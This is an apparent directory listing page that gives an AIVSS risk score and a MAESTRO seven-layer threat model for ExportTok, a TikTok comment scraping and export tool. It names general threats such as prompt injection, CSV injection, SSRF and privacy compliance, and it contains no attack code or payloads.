AgentReadyHomeAgent Listing

← ExportTok

ExportTok — agentic threat model

4.8AIVSS 4.8 · Medium

ExportTok is a low-risk, single-purpose utility focused on scraping and exporting TikTok comments. Its agentic risk is minimal due to its deterministic nature, lack of autonomous planning, and limited tool integration.

OWASP AIVSS score rationale

AIVSS = (CVSS_Base + AARS) × Mitigation_Factor, where AARS = (10 − CVSS_Base) × (Factor_Sum / 10) × ThM
CVSS base 4.3AARS uplift 0.49Factor sum 0.9/10Threat ×0.95Mitigation ×1.0
Autonomy of Action
0.10
Goal-Driven Planning
0.10
Self-Modification
0.00
Dynamic Tool Use
0.20
Persistent Memory
0.10
Contextual Awareness
0.10
Dynamic Identity
0.00
Multi-Agent Interactions
0.00
Non-Determinism
0.20
Opacity & Reflexivity
0.10

Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.

MAESTRO 7-layer threat model

Per-layer threats for this agent. Layers tagged “not certain from listing” are general, caveated commentary where the public description didn’t pin that layer.

L1 · Foundation Models⚠ not certain from listing

Not certain from the listing — The tool mentions 'analyzing audience feedback' but does not specify the underlying LLM. If an LLM is used for analysis, it is vulnerable to indirect prompt injection via malicious TikTok comments.

L2 · Data Operations⚠ not certain from listing

Not certain from the listing — Processes TikTok comment text, timestamps, and user info. Primary risks include data leakage of cached/stored exports and potential CSV injection attacks if scraped comment data is not sanitized before Excel export.

L3 · Agent Frameworks⚠ not certain from listing

Not certain from the listing — Likely uses a basic scraping script rather than a complex agentic framework. The main threat is insecure tool integration, specifically around the parsing and formatting of raw external web data.

L4 · Deployment & Infrastructure⚠ not certain from listing

Not certain from the listing — Hosted as a closed-source web service. Standard web application threats apply, including server-side request forgery (SSRF) if the scraper can be coerced into targeting internal network endpoints.

L5 · Evaluation & Observability⚠ not certain from listing

Not certain from the listing — No observability or guardrails are mentioned. There is a risk of scraping abuse or rate-limiting bypass attempts going unmonitored.

L6 · Security & Compliance (cross-cutting)⚠ not certain from listing

Not certain from the listing — Closed-source and freemium. Compliance risks are high regarding GDPR/CCPA due to the harvesting of public user profiles and comments, alongside potential violations of TikTok's Terms of Service regarding automated scraping.

L7 · Agent Ecosystem⚠ not certain from listing

Not certain from the listing — Operates as a standalone horizontal tool with no apparent multi-agent orchestration or ecosystem integrations.

MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).